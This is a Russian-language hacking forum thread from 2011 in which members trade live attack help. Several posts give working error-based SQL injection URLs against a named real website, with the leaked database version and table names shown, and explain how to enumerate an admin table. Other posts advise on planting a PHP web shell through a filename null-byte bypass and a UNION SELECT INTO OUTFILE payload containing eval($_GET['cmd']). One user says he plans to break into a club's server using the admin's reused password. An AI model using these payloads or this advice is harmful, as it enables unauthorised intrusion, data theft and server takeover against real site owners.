Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    941
    Likes Received:
    523
    Reputations:
    173

    что тут можно сделать?
     
  2. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1
    http://spotters.net.ua/file/?id=-1
    например сделать как показано выше и раскручивать :)

    Apache/2.2.21 (Unix) PHP5/5.2.14 with Suhosin-Patch mod_rpaf/0.6
     
    #18342 lion-art, 19 Nov 2011
    Last edited: 19 Nov 2011
  3. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1
    вот еще:
    http://spotters.net.ua/admin/

    полезно будет.

    ну и напоследок вот:
    http://spotters.net.ua/news/entry/?545'

    http://spotters.net.ua/news/entry/?id=1+or+1+group+by+concat(version(),floor(rand(0)*2)%20)having+min(0)+or+1--+

    MySQL ERROR: Duplicate entry '5.0.89-log1' for key 1
    SQL error

    5я ветка

    настроение задорное лови пока добрый :D
    начинай с этого запроса
    http://spotters.net.ua/news/entry/?id=1+or+1+group%20by%20concat((select%20concat(0x3a,table_name,0x3a)%20from%20information_schema.tables%20limit%2017,1),floor(rand(0)*2))%20having%20min(0)%20or%201+--+

    Duplicate entry ':admin_settings:1' for key 1

    перебор лимитом и все получится :)

    ну и что бы вопросов совсем не возникло перебор по столбцам делается так:

    http://spotters.net.ua/news/entry/?id=1+or+1+group%20by%20concat((select%20concat(0x3a,column_name,0x3a)%20from%20information_schema.columns%20where%20table_name='admin_settings'%20limit%200,1),floor(rand(0)*2))%20having%20min(0)%20or%201+--+
     
    #18343 lion-art, 19 Nov 2011
    Last edited: 19 Nov 2011
  4. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    165
    Likes Received:
    9
    Reputations:
    6
    Можно ли из бд вытащить пасс от фтп?
    Имеется уязвимый сайт,скулю крутил через Havij,сайт имеет Pure Ftpd,пасс отдельно храница или в бд?Шелл залить нужно,права доступа только на SELECT команды


    Еще 1 вопрос:Если добровольно жертва* загрузит шелл себе на пк можно ли будет приконектица?
    К примеру скачал шелл,закинул его в диск C,теперь чтобы приконектица просто ввести ip/shell.php? или что?
     
    #18344 alerondel, 19 Nov 2011
    Last edited: 19 Nov 2011
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    1.пассы от фтп в БД не хранятся ..за оооочень редким исключением
    2.ты имеешь в виду пхп шелл? подумай сам и ответь себе на вопрос..ключевое слово пхп
     
  6. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Тебе сначала нужно проникнуть в админку, оттуда залить шелл или через SQL-injection или другими возможными способами. Потом ты уже рутишь сервер / заливаешь на сервер radmin и управляешь им. А шелл допустим ты подкинул жертве...но шелл же написан на php! как он запуститься? :D чтобы запустился нужен .bat или .exe
     
    1 person likes this.
  7. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    165
    Likes Received:
    9
    Reputations:
    6
    Ясно спасибо за советы.Достал хеш самого админа,пароль мудреной ну да ладно,по слухам у него он 1 и тот же на всех его аккаунтах и прочих сервисах,почты.
    +
    Почему про шелл спрашивал потому что есть доступ в его клуб и 1 из Пк там сервер,хочу туда залезть,нужна бд.
     
  8. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Залил шелл

    _http://site.com/images/shell.php.lalalajpg

    Он не работает, и странице выводится вот это

    http://i28.fastpic.ru/big/2011/1120/03/8f12609e03abcc163a5e65951a2e3d03.png

    как сделать так чтобы шелл заработал?
     
  9. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    1) попробуй через инклуд(если есть)
    2) попробуй залить так shell.jpg%00.php
     
    1 person likes this.
  10. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Инклуда нет, и вариант shell.jpg%00.php - не проходит
    js выводит ошибку:
    Only JPEG files allowed
     
  11. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    1) Попробуй подменить POST-запрос, через Tamper Data
    2) SQL-injection есть??
     
  12. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    sql-inj есть, щас попробую
     
  13. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    1) http://site.com/index.php?id=-1'+union+select+1,2,'<?php eval($_GET[‘cmd’]) ?>',4+into+outfile+'полный путь/1.php'--
    P.S: у пользователя должны быть права на запись
    2) http://site.com/index.php?id=-1'+union+select+1,2,File_Priv,4+from+mysql.user+where+user= 'root'--
    Если появиться Y то действуй дальше
     
  14. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Доступа к mysql нет.
     
  15. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    подскажите код батника, чтобы он открывал удаленное управление компьютером
     
  16. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Есть только батник кряк интернета, надо?
     
    1 person likes this.
  17. AppS

    AppS Member

    Joined:
    8 Aug 2009
    Messages:
    249
    Likes Received:
    25
    Reputations:
    6
    Может ТС имел что то типо этого ?

    hххp://forum.antichat.ru/thread276456-telnet.html
     
  18. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    ТС имел ввиду вот это

     
  19. AppS

    AppS Member

    Joined:
    8 Aug 2009
    Messages:
    249
    Likes Received:
    25
    Reputations:
    6
    Это надо у него спросить;)

    В общем вопрос состоит в следующем, вот тут в статье thread43966-sql.html

    есть такой абзац
    Тыкните пальцем где про это можно почитать? Я знаю что Гугл знает все ;) но что то сегодня мы с ним не дружим)
    Заранее спасибо!
     
  20. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    677
    Likes Received:
    332
    Reputations:
    120
    https://rdot.org/forum/showthread.php?t=352
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.